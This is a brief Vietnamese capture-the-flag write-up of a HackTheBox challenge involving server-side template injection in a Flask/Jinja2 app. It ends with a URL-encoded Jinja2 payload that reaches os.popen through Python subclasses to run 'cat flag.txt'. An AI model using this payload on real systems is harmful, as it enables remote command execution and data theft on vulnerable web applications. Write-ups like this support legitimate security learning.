Đây là phần code mình thấy khá là ma giáo khi chơi hackthebox, họ cho một trang nói t build bằng gì thôi thế là hết

Thực ra với mình thế là đủ vì từ khóa flask/jinja2 exploit sẽ cho mình kết quả mình cần
https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee
tính thử 7*7 xem sao

chuẩn kết quả rồi thì phang thôi

flag nè

submit và kết quả

payload:
%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22cat%20flag.txt%22).read()%7D%7D